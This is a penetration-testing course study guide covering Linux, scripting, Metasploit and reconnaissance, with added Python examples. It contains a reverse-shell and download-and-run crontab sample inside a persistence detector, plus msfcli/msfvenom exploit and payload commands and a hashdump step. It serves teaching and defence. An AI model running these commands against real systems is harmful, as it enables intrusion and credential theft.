
Study Guide
Advanced Penetration Testing
Created by: Julio A. Hawthorne, Teaching Assistant

Module 1: Linux

Lesson 1.1: Linux (Part 1)


Skills Learned From This Lesson: Intro

Lesson 1.2: Linux (Part 2)


Skills Learned From This Lesson: CLI Basics, Linux Default Directories, User Creation,
Superuser Permissions
● > pwd - print working directory
● > ls - list directory contents
○ > ls -a - list directory contents including hidden files
○ > ls -l - list directory contents with details
● > cd - change directory
○ > cd .. - move to parent directory
○ > cd ../.. - move two parent directories back
● > man (manpage) - Format and display the manual pages for a linux CLI command
● Default linux directories -
○ > / - root directory
○ > /bin, /usr/bin - contains standard binaries for linux user commands
○ > /boot - contains linux kernel and bootloader
○ > /dev - contains devices (hard drives, RAM, etc)
○ > /etc - configuration files
○ > /home - default location for all users' home directories
○ > /lib, /usr/lib - hold library files for binaries contained in /bin, /sbin
○ > /lost+found - contains orphaned files
○ > /mnt - default mount point for file systems mounted post-boot

 
Brought to you by:  Develop your team with the ​fastest growing catalog​ in the 
cybersecurity industry. Enterprise-grade workforce development 
management, advanced training features and detailed skill gap and 
 
competency analytics. 

 
 

○ > /opt - contains optional files and programs


○ > /proc - virtual directory (procfs) exposing one subdirectory per running process (/proc/[pid]) plus kernel and hardware information (e.g. /proc/cpuinfo, /proc/net/tcp); some entries under /proc/sys can be written to change kernel settings at run time
○ > /root - home directory for the root superuser
○ > /sbin, /usr/sbin - contains standard binaries for linux system commands
○ > /tmp - temporary directory, all users have read+write permissions
○ > /usr - contains application files for users (stands for UNIX system resources)
○ > /var - contains files that are constantly changing (e.g. log files)
○ > /sys - virtual directory (sysfs) exposing the kernel's view of devices, drivers and buses; it is not a copy of the kernel source tree
● Older Kali Linux releases (before 2020.1) logged in as root by default, unlike most operating systems; current releases create an unprivileged user (kali) and expect sudo for privileged commands.
● > rm - Remove files or directories
○ > rm -r - Remove directories recursively
○ > rm -rf - Force remove directory without confirmation
● > adduser - create new linux user, modify existing user accounts
○ > adduser [existing username] [group name] - add an existing user to a group
● > su - switch user
● By default, normal linux user accounts have limited privileges. The 'sudo' command allows a permitted user to run individual commands as root (or another user), typically after authenticating with their own password; 'sudo -i' opens a full root shell.

Lesson 1.3: Linux (Part 3)


Skills Learned From This Lesson: Managing files, moving through linux directories, text editor
basics
● Every object in linux is defined as a 'file'.
● > touch - create file
● > mkdir - create directory
● > mv [current file location] [desired file location] - move file (copy file to new location,
delete original)
● > cp [current file location] [desired file location] - copy file
● absolute path - full directory path to a file (e.g. /etc/apt/sources.list.d/docker.list).
● relative path - path to a file relative to the current working directory using shortcuts (e.g.
if currently in /home/user directory, to get to /usr/local/bin type "cd ../../usr/local/bin").
● > echo [string] - print the typed string to the standard output (to the terminal screen)
○ > echo [string] > filename - print the typed string into a file overwriting its current
contents

 

○ > echo [string] >> filename - append the typed string to the end of a file
● > cat - concatenate files and print to the standard output (terminal screen)
● > vi/vim - Modal text editor(s): the same keystrokes mean different things in Command Mode and Insert Mode
○ > i - Switch to Insert Mode. Allows text entry
○ > ESC - Return to Command Mode.
○ > dd - Delete the entire current line (Command Mode)
○ > :wq - Save changes and quit vim (from Command Mode); :wq! forces the write, e.g. to a read-only file you own
○ > :q! - Quit vim (from Command Mode) without saving changes
● > nano - Simple text editor
○ > CTRL+W - Where is... (Search)
○ > CTRL+X - exit
● > gedit - GNOME desktop environment's default text editor
● > emacs - extensible text editor(s)

Lesson 1.4: Linux (Part 4)


Skills Learned From This Lesson: File Permissions, Advanced Textfile Manipulation, APT
Package Manager
● Unix Permissions - Read (r), Write (w), Execute (x)
● Symbolic notation (what ls -l prints) is three groups of rwx characters, in this order:
○ First group - permissions for the file Owner (e.g. rwx)
○ Second group - permissions for members of the file's Group (e.g. rw-)
○ Third group - permissions for everyone else (Other, sometimes called "Global" or "World") (e.g. r--)
○ e.g. rwxrw-r-- : the owner may read, write and execute; the group may read and write; everyone else may only read.
● Octal notation - each group is written as one digit, the sum of r=4, w=2, x=1:
○ 0 - None
○ 1 - Execute
○ 2 - Write
○ 3 - Write & Execute
○ 4 - Read
○ 5 - Read & Execute
○ 6 - Read & Write
○ 7 - Read, Write & Execute
○ rwxrw-r-- is therefore 764 (owner 7, group 6, other 4).
● > chmod - Change the access permissions of a file or directory, in octal (chmod 764 file) or symbolic form (chmod u+x file, chmod o-w file)
● > | (pipe) - Route the output from a command into another command
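Added example (the editor's, not part of the course material): a Python 3 script that converts between the symbolic rwx string ls -l prints and the octal mode chmod takes, and applies a mode to a scratch file to confirm what the kernel actually records. It goes slightly beyond the lesson by also handling the setuid, setgid and sticky bits, which show up as s/t in the execute slots and matter when hunting for privilege-escalation paths. Function names and the sample modes are assumptions of the example.

```python
# Added example (not from the course material): convert between the symbolic
# permission string that `ls -l` prints and the octal mode that chmod takes,
# then apply a mode to a scratch file and confirm it with os.stat().
import os
import stat
import tempfile

# Bit value of each character position in the 9-character rwx string:
# owner first, then group, then everyone else.
_BITS = (stat.S_IRUSR, stat.S_IWUSR, stat.S_IXUSR,
         stat.S_IRGRP, stat.S_IWGRP, stat.S_IXGRP,
         stat.S_IROTH, stat.S_IWOTH, stat.S_IXOTH)


def symbolic_to_mode(symbolic):
    """'rwxrw-r--' -> 0o764. Accepts the 9 rwx characters; an 's' or 't' in an
    execute slot (setuid, setgid, sticky) is mapped onto the special bits."""
    if len(symbolic) != 9:
        raise ValueError("expected 9 characters, e.g. rwxr-xr--")
    mode = 0
    for pos, ch in enumerate(symbolic):
        if ch == "-":
            continue
        if ch in "rwx":
            mode |= _BITS[pos]
        elif ch in "sS" and pos == 2:      # setuid is shown in the owner execute slot
            mode |= stat.S_ISUID | (_BITS[pos] if ch == "s" else 0)
        elif ch in "sS" and pos == 5:      # setgid is shown in the group execute slot
            mode |= stat.S_ISGID | (_BITS[pos] if ch == "s" else 0)
        elif ch in "tT" and pos == 8:      # sticky bit is shown in the other execute slot
            mode |= stat.S_ISVTX | (_BITS[pos] if ch == "t" else 0)
        else:
            raise ValueError("unexpected character %r at position %d" % (ch, pos))
    return mode


def mode_to_symbolic(mode):
    """0o750 -> 'rwxr-x---'. Special bits are rendered the way ls -l does."""
    chars = []
    for pos, bit in enumerate(_BITS):
        letter = "rwx"[pos % 3]
        chars.append(letter if mode & bit else "-")
    if mode & stat.S_ISUID:
        chars[2] = "s" if mode & stat.S_IXUSR else "S"
    if mode & stat.S_ISGID:
        chars[5] = "s" if mode & stat.S_IXGRP else "S"
    if mode & stat.S_ISVTX:
        chars[8] = "t" if mode & stat.S_IXOTH else "T"
    return "".join(chars)


def world_writable(mode):
    """True when 'everyone else' may write (the /tmp situation)."""
    return bool(mode & stat.S_IWOTH)


def chmod_and_verify(mode):
    """Apply `mode` to a fresh temporary file (like `chmod 700 file`) and
    return the permission bits the kernel actually recorded."""
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        os.chmod(path, mode)
        return stat.S_IMODE(os.stat(path).st_mode)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(oct(symbolic_to_mode("rwxrw-r--")))   # 0o764
    print(mode_to_symbolic(0o4755))             # rwsr-xr-x (setuid root binary look)
    print(oct(chmod_and_verify(0o700)))         # 0o700
```

chmod is not affected by the umask, so chmod_and_verify returns exactly the mode it set; the umask only filters the mode of newly created files.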

 

● > grep - Matches patterns from input text. Supports simple patterns and regular
expressions (regex)
● > cut - cut out selected fields (or characters) from each line of a file or the standard input
○ > cut -d [char] - the delimiter that separates fields (a single character; the default is TAB)
○ > cut -f [N] - which field(s) to print, counted from 1 (e.g. cut -d " " -f 4 prints the 4th space-separated word of each line)
● > sort - Sort lines of text files
○ > sort -u - Sort lines of text files and remove duplicates
● > sed - edit text in a scriptable manner
● > awk - A versatile programming language for manipulating files
● > apt - front end to APT (the Advanced Package Tool). Allows management of installed programs on Debian/Ubuntu based Linux distributions (aptitude is a separate, optional front end to the same package system).
○ > apt-get install [Package Name] (or apt install [Package Name]) - install a package
○ > apt update - refresh the package lists before installing or upgrading
● > netstat - check for listening ports on the machine (netstat -tulpn lists listening TCP/UDP sockets with the owning process; ss -tulpn is the modern replacement)
● > apache2 - Web server, installed (but not started) by default on Kali Linux
● > service [service name] start|stop|restart|status - Manage the state of a linux service (systemctl start|stop|restart|status [service name] on systemd-based systems)
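Added example (the editor's, not part of the course material): the Python equivalent of the grep / cut / sort | uniq -c pipeline, run over sshd lines from /var/log/auth.log. In the shell the same job is grep "Failed password" /var/log/auth.log | awk '{print $(NF-3)}' | sort | uniq -c | sort -rn; awk's $(NF-3) is used instead of cut -f because cut counts every space as a separator, so the field number of the IP shifts when the day of the month is padded with two spaces or the line says "invalid user". The log lines below are constructed for the example and the function names are the editor's.

```python
# Added example (not from the course material): the Python equivalent of
#   grep "Failed password" auth.log | awk '{print $(NF-3)}' | sort | uniq -c | sort -rn
# The regex keys on "from <ip>" so it does not depend on field positions.
import re
from collections import Counter

# Constructed sample of sshd lines in the syslog-style auth.log format.
SAMPLE_AUTH_LOG = """\
Mar  3 09:14:01 kali sshd[2211]: Accepted password for alice from 192.168.1.20 port 51234 ssh2
Mar  3 09:14:07 kali sshd[2213]: Failed password for root from 10.0.0.5 port 40022 ssh2
Mar  3 09:14:09 kali sshd[2213]: Failed password for root from 10.0.0.5 port 40022 ssh2
Mar  3 09:14:12 kali sshd[2214]: Failed password for invalid user admin from 10.0.0.5 port 40030 ssh2
Mar  3 09:14:30 kali sshd[2217]: Failed password for bob from 192.168.1.44 port 52000 ssh2
Mar  3 09:15:02 kali CRON[2220]: pam_unix(cron:session): session opened for user root by (uid=0)
"""

_FAILED = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+)"
)


def failed_logins(log_text):
    """grep: keep only matching lines, and pull out (user, ip) from each."""
    pairs = []
    for line in log_text.splitlines():
        m = _FAILED.search(line)
        if m:
            pairs.append((m.group("user"), m.group("ip")))
    return pairs


def failures_by_source(log_text):
    """sort | uniq -c | sort -rn: failures per source IP, busiest first."""
    counts = Counter(ip for _, ip in failed_logins(log_text))
    return counts.most_common()


def unique_targeted_users(log_text):
    """sort -u on the username field."""
    return sorted({user for user, _ in failed_logins(log_text)})


if __name__ == "__main__":
    for ip, n in failures_by_source(SAMPLE_AUTH_LOG):
        print("%4d %s" % (n, ip))
    print(unique_targeted_users(SAMPLE_AUTH_LOG))
```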

Lesson 1.4: Linux (Part 4), continued


Skills Learned From This Lesson: Creating cron jobs, Managing crontabs, checking listening
network ports
● crontab - schedules commands to run at time-based intervals (fields: minute, hour, day of month, month, day of week, then the command); crontab -e edits the current user's jobs and crontab -l lists them. Can be used to establish persistence on a machine, which also makes it a place to look when checking a machine for persistence.
● > netcat (nc) - Utility for reading from and writing to network connections (TCP or UDP)
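Added example (the editor's, not part of the course material): because cron is a standard persistence mechanism, a responder wants a quick way to flag crontab entries worth a second look. The script parses the output format of crontab -l and applies a few heuristics (runs every minute or at boot, command living in a world-writable directory, bash /dev/tcp reverse shell, download piped to a shell, base64 decoded at run time). The crontab text is constructed for the example and the rules are illustrative, not a complete detection set.

```python
# Added example (not from the course material): parse crontab entries and flag
# the ones a responder would want to look at as possible persistence.
import re

# Constructed crontab text, in the same format `crontab -l` prints.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update >/dev/null 2>&1
*/5 * * * * /tmp/.x/update.sh
@reboot /bin/bash -c 'bash -i >& /dev/tcp/10.0.0.5/4444 0>&1'
30 2 * * 0 /usr/sbin/logrotate /etc/logrotate.conf
* * * * * curl -s http://10.0.0.5/p.sh | sh
0 9 * * 1-5 echo "aGVsbG8=" | base64 -d
"""

# (regex applied to "<schedule> <command>", reason reported when it matches)
SUSPICIOUS_PATTERNS = [
    (re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s"), "runs every minute"),
    (re.compile(r"^@reboot"), "runs at boot (@reboot)"),
    (re.compile(r"(^|\s)/(tmp|dev/shm|var/tmp)/"), "command lives in a world-writable directory"),
    (re.compile(r"/dev/tcp/"), "bash /dev/tcp reverse shell"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "downloads and pipes to a shell"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "decodes base64 at run time"),
]


def parse_crontab(text):
    """Split crontab lines into (schedule, command); comments and blanks are skipped."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):                 # @reboot, @daily, ... : one schedule word
            schedule, _, command = line.partition(" ")
        else:
            fields = line.split(None, 5)          # minute hour dom month dow command
            if len(fields) < 6:
                continue
            schedule, command = " ".join(fields[:5]), fields[5]
        entries.append((schedule, command))
    return entries


def suspicious_entries(text):
    """Return [(schedule, command, [reasons])] for entries matching a heuristic."""
    flagged = []
    for schedule, command in parse_crontab(text):
        line = "%s %s" % (schedule, command)
        reasons = [why for rx, why in SUSPICIOUS_PATTERNS if rx.search(line)]
        if reasons:
            flagged.append((schedule, command, reasons))
    return flagged


if __name__ == "__main__":
    for schedule, command, reasons in suspicious_entries(SAMPLE_CRONTAB):
        print("%-14s %s\n    -> %s" % (schedule, command, ", ".join(reasons)))
```

On a real host, feed it the output of crontab -l for every user (crontab -l -u [user] as root) and the contents of /etc/crontab and /etc/cron.d/*; the system files carry an extra user field between the schedule and the command, which this parser would treat as the start of the command.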

Teaching Assistant Extra Credit


● > tldr - Community-driven Linux command line program that gives a brief description of a
command and examples for its use. Available in some Linux distributions' package
managers and on github (https://github.com/tldr-pages/tldr).

Module 2: Programming

Lesson 2.1: Programming (Part 1) Fundamentals for Pen Testers


Skills Learned From This Lesson: Intro

 

Lesson 2.2: Programming (Part 2) Bash Scripting and If/Then Command


Skills Learned From This Lesson: ping, Bash Scripting, Environment Variable, If/Then
statements.
● ping - sends an ICMP ECHO_REQUEST to a host in a network. helps determine if a
host is alive.
● > echo $PATH - displays the places that linux looks for executables [Environment
Variable]
● > chmod 700 [filename] - gives the file's owner read, write and execute permission and removes all access for the group and everyone else; the execute bit is what allows the script to be run as ./ping.sh
● > If/Then - Conditional statement in computer programming. 'If' this thing happens,
'Then' do this.
● > ping.sh
#!/bin/bash
# Putting the hash symbol at the beginning of a line signifies it as a comment. It is
# not read by the interpreter but can be used to help people reading the code
# understand what the code is doing.

# "$1" is the first argument typed after ./ping.sh, i.e. the [network].
# If that argument is empty, run the following commands (print the usage message).
if [ "$1" == "" ]
then
    echo "Usage: ./ping.sh [network]"
    echo "Example: ./ping.sh 192.168.1"
fi

Lesson 2.3: Programming (Part 3) Network Pings


Skills Learned From This Lesson: Else Statements, While Loop, Double-quotes in Bash
Scripting
● Else - Conditional Statement. If no defined condition is met in an 'If/Then' statement, do
'Else'.
● While/For Loop - Repeats a given operation While a condition exists/For each iteration in
a list.
● > seq [first] [last] - print a sequence of integers, one per line (e.g. seq 1 254)
● Wrapping text in double quotes "" makes the shell treat it as a single word (one argument) while still expanding $variables inside it; single quotes '' also suppress the expansion.

 

● > ping.sh
#!/bin/bash
if [ "$1" == "" ]
then
    echo "Usage: ./ping.sh [network]"
    echo "Example: ./ping.sh 192.168.1"
else
    # $(seq 1 254) is command substitution: it expands to the numbers 1..254.
    # (Plain single quotes around seq, as printed in some copies of this script,
    # would make the loop run once with the literal string "seq 1 254".)
    for x in $(seq 1 254); do
        # One echo request per host; keep the "64 bytes from <ip>:" reply line,
        # take the 4th space-separated field and strip its trailing colon.
        ping -c 1 "$1.$x" | grep "64 bytes" | cut -d " " -f 4 | sed 's/.$//'
    done
fi

Lesson 2.4: Programming (Part 4) Python for Port Scanning


Skills Learned From This Lesson: Python 'socket', if/else Statements in Python, for Loops in
Python
● > which - prints location of a command binary to the terminal screen (e.g. which python)
● > module - In python, a predefined library of commands used to simplify python
programming
● > import - In python, tells the interpreter to use a specific module
● 'socket' module - In python, provides access to the BSD socket interface, available on all
modern Unix systems, Windows, MacOS and probably additional platforms.
● > raw_input - Receives input from the user for use in the python script (Python 2). In Python 3 the equivalent is input(), which always returns a string; Python 2's input() evaluated the typed text as Python code, so it must never be used on untrusted input.
● > socket.AF_INET - In python, specifies the address family the socket can communicate
with, in this case IPv4.
● > socket.SOCK_STREAM - In python, signifies the socket will communicate with TCP
sockets.
● > sock.connect - In python, connect the socket to a remote address. For IP sockets
specify (host, port)
● > sock.connect_ex - In python, works like 'sock.connect' but returns an error code (0 on success, otherwise an errno value) instead of raising an exception (and crashing the program) when the connection fails.
● In python, blocks (the body of an if/else, a loop or a function) are delimited by indentation rather than braces.
● > python.py
#!/usr/bin/env python3
import socket

# Python 3: input() returns the typed text as a string. (The Python 2 original used
# raw_input() for the address and input() for the port; input() in Python 2
# evaluated the text as an expression, which is why the int() conversion is explicit here.)
ip = input("Enter the IP address: ")
port = int(input("Enter the port number: "))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2)   # without a timeout a filtered port can stall the script for a long time
# connect_ex returns 0 on success or an errno value instead of raising an exception
if sock.connect_ex((ip, port)):
    print("Port", port, "is closed")
else:
    print("Port", port, "is open")
sock.close()
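Added example (the editor's, not part of the course material): the single-port script above scaled up into a small TCP connect scanner. It keeps socket.connect_ex() at its core but adds what a practitioner needs in practice: a timeout (otherwise one filtered port can stall the scan for minutes), concurrent probes over a list of ports, and a distinction between "closed" (the host answered with a reset) and "filtered" (nothing came back). The helper local_listener() opens a throwaway port on 127.0.0.1 so the scanner can be tried without a remote target; all function names are assumptions of the example.

```python
# Added example (not from the course material): a Python 3 TCP connect scanner
# built on socket.connect_ex(), with a timeout, concurrency and a three-way
# open / closed / filtered verdict instead of just open / closed.
import errno
import socket
from concurrent.futures import ThreadPoolExecutor


def probe_port(host, port, timeout=1.0):
    """Return 'open', 'closed' (connection refused) or 'filtered' (no answer in time)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)                 # connect_ex honours the timeout
        result = sock.connect_ex((host, port))   # 0 on success, otherwise an errno value
    if result == 0:
        return "open"
    if result == errno.ECONNREFUSED:
        return "closed"                          # the host answered with a RST
    return "filtered"                            # EAGAIN/ETIMEDOUT/EHOSTUNREACH: dropped or unreachable


def scan(host, ports, timeout=1.0, workers=64):
    """Probe every port in `ports` concurrently; returns {port: state}."""
    ports = list(ports)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        states = list(pool.map(lambda p: probe_port(host, p, timeout), ports))
    return dict(zip(ports, states))


def open_ports(host, ports, timeout=1.0):
    """Sorted list of the ports that accepted a connection."""
    return sorted(p for p, state in scan(host, ports, timeout).items() if state == "open")


def local_listener():
    """Open a listening socket on a free localhost port so the scanner can be
    tried without a remote target; returns (socket, port). Close it when done."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    return srv, srv.getsockname()[1]


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    for port, state in sorted(scan(target, range(1, 1025)).items()):
        if state != "closed":
            print("%d/tcp %s" % (port, state))
```

Usage: python3 scanner.py 192.168.1.10 prints every port in 1-1024 that is open or filtered. A full connect() is logged by the target application and is noisier than nmap's SYN scan (-sS), which is one reason the course moves on to nmap.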

Lesson 2.5: Programming (Part 5) Basics of the C Language


Skills Learned From This Lesson: Functions, Basics of C, Compilers
● Function - a block of organized, reusable code that is used to perform a single, related
action.
● int main - the program's entry point: the function the C runtime calls when the program starts; its int return value becomes the process exit status
● argc - contains the number of arguments passed to the program
● argv - a one dimensional array of strings/command line arguments
● Unlike python and bash (which are interpreted languages), C must be compiled using a
compiler (gcc for Linux, Xcode on MacOS and Microsoft Visual Studio on Windows
amongst others)
● > cprogram.c
#include <stdio.h>

int main(int argc, char *argv[])
{
    if (argc < 2)
    {
        printf("%s\n", "Pass your name as an argument");
        return -1;
    }
    else
    {
        printf("Hello %s\n", argv[1]);
        return 0;
    }
}

 

● 'gcc cprogram.c -o cprogram' to compile.

Teaching Assistant Extra Credit


● To make programming easier, download, install and use an IDE (Integrated
Development Environment) when programming.
○ PyCharm - Python
○ VSCode - Javascript, HTML, CSS, Python, Go, etc.
○ Eclipse - Java
○ Atom - Developed by github
○ Sublime Text - Supports multiple languages
● http://docs.python.org/2/refrence/index.html#reference-index - Manual for the syntax and
core semantics of Python.
● https://docs.python.org/2/library/ - Manual for the Python Standard Library and Modules.

Module 3: Metasploit

Lesson 3.1: Metasploit (Part 1) Introduction


Skills Learned From This Lesson: Intro

Lesson 3.2: Metasploit (Part 2) Fundamentals


Skills Learned From This Lesson: Metasploit Basics, Public Exploit Databases, Exploit
'Best-Practices'
● Metasploit Framework is written in ruby
● In Kali Linux, Metasploit's general resources & source code are located in
/usr/share/metasploit-framework
● Exploits - contains exploit source code separated by platform/attack vector
● ms08_067_netapi - A buffer overflow vulnerability triggered by a specially crafted RPC
(Remote Procedure Call) request.
● Be sure to properly vet any code/exploits downloaded from the internet prior to running
said code on your machine.
● Iceweasel - Debian's rebranded build of Firefox, formerly the default browser in Kali Linux (the GNU Project's own Firefox fork is GNU IceCat; current Kali releases ship Firefox ESR)
● Public databases for vulnerability and exploit research:
○ Exploit Database (http://www.exploit-db.com)
○ Packet Storm (https://packetstormsecurity.com)
 

○ SecurityFocus (https://www.securityfocus.com)
● Shellcode in public exploits is typically an opaque blob of bytes that cannot be reviewed by reading it. Replace it with shellcode you generated yourself (e.g. with msfvenom) to reduce the chance that unexpected malicious code is executed in your pentesting environment.
● It's best practice to test publicly obtained exploits against a test machine/VM prior to running the code against a client machine.

Lesson 3.3: Metasploit (Part 3) Operation


Skills Learned From This Lesson: Starting Metasploit, Loading a Metasploit Module,
Understanding Module Options, Running an Exploit
● > msfupdate - Updates Metasploit to the latest module tree (on Kali Linux, msfupdate now defers to the package manager: apt update && apt install metasploit-framework).
● Metasploit uses PostgreSQL as its database server. On older Kali releases run 'service postgresql start' and 'service metasploit start'; on current releases run 'systemctl start postgresql' (or 'service postgresql start') and initialise the database once with 'msfdb init', prior to starting Metasploit.
● > msfconsole - Starts the Metasploit Framework Console.
● > ipconfig - In Windows, displays information for connected networking devices.
● > ifconfig or ip addr - In Linux, displays information for connected networking devices.
● https://rapid7.com/db/?type=metasploit - Database of Metasploit Framework modules.
● Meterpreter - Metasploit's advanced in-memory payload. The Windows version is the one used in this course; Linux, Android and other versions also exist.
● Inline (single) Payload (Platform/PayloadType_PayloadName, e.g. windows/shell_reverse_tcp) - Puts the entire payload in the attack string. Can be comparatively large in byte size.
● Staged Payload (Platform/PayloadType/PayloadName, e.g. windows/shell/reverse_tcp) - Puts just enough code (the stager) in the attack string to call back to the handler and fetch the rest of the payload (the stage).
● Handler - In Metasploit, listens on a network port for the payload's connection back (or, for a bind payload, connects out to the target) and turns that connection into a session.
● msf > help - Displays a comprehensive list of the commands for msfconsole CLI
● msf > help [command] - Displays information pertaining to the supplied command
● msf > search [pattern] - Searches the loaded module tree (and the database cache, when connected) for modules matching the supplied pattern
● msf > info [path/to/metasploit/module] - Gives information on the specified module and
its use
○ Name:
○ Module:
○ Platform:
○ Privileged: (Will exploit give us a session with elevated privileges)
○ License:

 

○ Rank:
○ Provided By: (Module Author)
○ Available targets
○ RHOST: Remote Host
○ RPORT: Remote Port
○ LHOST: Local Host
○ LPORT: Local Port
○ EXITFUNC: (Specifies how the process that will be attacked will exit)
○ Payload Information: (basic info for the payload to be injected)
○ Description:
● msf > use [path/to/metasploit/module] - Moves into the context of the module.
● msf module_type(name_of_module) > show options - Displays all of the adjustable
options available to the module.
● msf module_type(name_of_module) > show targets - Displays the available target
platforms.
● msf module_type(name_of_module) > show payloads - Displays all the available
payloads we can use for this module.
● msf module_type(name_of_module) > set [option] - Sets the value for the specified
option.
● msf module_type(name_of_module) > exploit/run - runs the module or exploit with
specified options.
● CTRL + Z - Backgrounds an active Metasploit session.
● msf > sessions -l - Lists active sessions.
● msf > sessions -i [session number] - switches context to the specified active session.

Lesson 3.4: Metasploit (Part 4) Auxiliary Module


Skills Learned From This Lesson: Auxiliary Modules, Module Options, SMB
● Auxiliary modules are primarily used for information gathering and vulnerability scanning.
● For SMB-based Windows auxiliary modules, the SMBDomain should be set to the
domain that the machine is a member of. If the machine isn't a part of a domain, this field
can be set to the name of the workgroup (typically WORKGROUP) the machine is a
member of.
● THREADS can be increased to increase scanning speeds if multiple hosts are being
scanned.
 

Lesson 3.5: Metasploit (Part 5) msfcli


Skills Learned From This Lesson: msfcli basics, msfcli command syntax, msfcli use cases
● msfcli ran a Metasploit module from the Linux command line as a one-liner. Note: msfcli was removed from the Metasploit Framework in 2015; the equivalent today is 'msfconsole -x "use ...; set ...; run"' or a resource script passed with 'msfconsole -r file.rc'.
● msfcli was an excellent tool to integrate in a script to automate penetration testing operations (msfconsole -x and -r fill the same role now).
● > msfcli -h - Displays the msfcli help panel
● Command Syntax - msfcli <exploit_name> <option=value> [mode]
● Every time msfcli is run it must reload the module tree. This could take time if your machine/virtual machine is low on resources but shouldn't be too bad if the machine is newer and has enough resources (4 processing cores, 4-8 GB ram).
● > msfcli exploit/windows/smb/ms08_067_netapi payload=windows/shell/reverse_tcp
LHOST=[ip_address_of_attacker_machine]
LPORT=[port_listening_on_attacker_machine] RHOST=[ip_address_of_target_machine]
RPORT=[port_on_target_that_service_is_running_on]

Lesson 3.6: Metasploit (Part 6) msfvenom


Skills Learned From This Lesson: msfvenom payloads, msfconsole handlers, Meterpreter
Basics
● msfvenom is an encapsulation of msfpayload and msfencode. This tool allows an
attacker to create custom payloads, encode them and use them in the context of a
penetration test.
● > msfvenom -h - Displays the help panel.
● The option syntax of msfvenom is very similar to that of msfcli: OPTION=value pairs follow the payload name. LHOST and LPORT are the attacker machine's address and the port the handler listens on (the target's address is not needed, because a reverse payload connects back to the attacker).
● > msfvenom -p windows/meterpreter/reverse_tcp LHOST=[ip_address_of_attacker_machine] LPORT=[port_listening_on_attacker_machine] -f exe -o payload.exe
○ > -p <payload>
○ > -o <file> - write the generated payload to this output file
○ > --list-options - show the options the chosen payload accepts
○ > -f <format> - output format (exe, elf, raw, c, python, ...)
○ > --help-formats (newer versions: --list formats) - lists the available output formats
○ > -e <encoder> -i <iterations> - encode the payload (the msfencode part of the old workflow); encoding changes the bytes but does not by itself evade modern anti-virus

 

● /var/www - Default location where Apache2 WebServer serves files.


● > service apache2 start/systemctl start apache2.service - Starts the Apache2 Web
Server
● A handler (msf > use exploit/multi/handler) must be started and listening in msfconsole to receive the connection from the staged payload once it runs on the target. Set the handler's payload to the same payload created with msfvenom (set payload windows/meterpreter/reverse_tcp) and set the same LHOST (ip_address_of_attacker_machine) and LPORT (port_listening_on_attacker_machine), then start it (exploit -j keeps it listening in the background).
● Linux commands such as 'ifconfig' and 'ip addr' can be run directly from the command
line to get system information for use with msfconsole.
● meterpreter > help - Lists information on commands available in the meterpreter session.
● meterpreter > getuid - Displays user identification info for the user account that the
meterpreter session is running as.
● meterpreter > hashdump - Dumps the password hashes (NTLM) of the local user accounts on the machine. Requires SYSTEM privileges; if getuid shows a lower-privileged user, try getsystem or a privilege-escalation module first.

Teaching Assistant Extra Credit


● Two common ways to vet code & exploits obtained from the internet (in addition to reading the code) are analyzing the binary or shellcode in a disassembler or debugger (Ghidra, WinDbg, OllyDbg, etc.) on an isolated machine and/or running the code in a sandbox (Cuckoo Sandbox, Joe Sandbox).
● http://github.com/enaqx/awesome-pentest - A collection of awesome penetration testing
resources, tools and other shiny things.
● https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf - Metasploit
Cheat Sheet by the SANS Institute.

 

Module 4: Information Gathering

Lesson 4.1: Information Gathering Intro (Part 1)


Skills Learned From This Lesson: Intro

Lesson 4.2: Information Gathering (Part 2) Domain Name Services


Skills Learned From This Lesson: DNS Records, DNS Brute Forcing, DNS Zone Transfers
● OSINT (Open Source INTelligence) - The collection and analysis of information gathered
from public sources.
● > whois - Searches the public registrar database for information on a domain.
● > nslookup - Queries DNS to obtain the domain name, IP address or other DNS records
(CNAME, MX, A, AAAA, etc).
○ > set type=[record_type] - Specify the DNS record.
● > dig (domain information groper) - DNS lookup tool similar to nslookup but with more detailed, script-friendly output (e.g. dig [domain] MX; dig @[nameserver] [domain] AXFR attempts a zone transfer).
● > host - a simple tool for performing DNS lookups in linux.
○ > host -t ns [domain] - Obtain the nameservers associated with a domain.
○ > host -l [domain] [nameserver] - Attempt a DNS Zone Transfer using host
command.
● > fierce - A DNS reconnaissance script (originally Perl, since rewritten in Python) that brute-forces subdomains from a wordlist and follows up on the DNS records it finds.

Lesson 4.3: Information Gathering (Part 3) Targeting Email and Maltego


Skills Learned From This Lesson: theharvester, Maltego Fundamentals, Shodan Overview
● > theharvester - Automated tool that queries various public sources (search engines, certificate logs, etc.) to gather OSINT, using email addresses, subdomains and hostnames of a target domain as its vector.
● netcraft.com - Website providing OSINT on companies, their domains and the
technologies that run their websites.
● Maltego - Graphical OSINT tool that provides a library of 'transforms' that visualize data
in a graph format for link analysis and data mining.
● Shodan.io - Scans the internet 24/7 pulling banners from the ports of hosts publicly
facing the internet

Lesson 4.4: Information Gathering (Part 4) recon-ng and Google Operators


 

Skills Learned From This Lesson: Google Operators, Google Hacking Database, recon-ng
● > recon-ng - an OSINT framework for information gathering that works with modules, a console and a workspace database
similar to the Metasploit Framework.
● Google Hacking Database (https://www.exploit-db.com/google-hacking-database) -
Public database of google hacking operators that can be used in google searches to find
specific information.

Lesson 4.5: Information Gathering (Part 5) Nmap and Port Scanning


Skills Learned From This Lesson: NMap Port Scanning, Banner Grabbing, Nmap Output
● In addition to being available by default in Kali Linux, Nmap can be installed using the
package manager for most Linux distributions.
● Zervit - A simple and compact HTTP server.
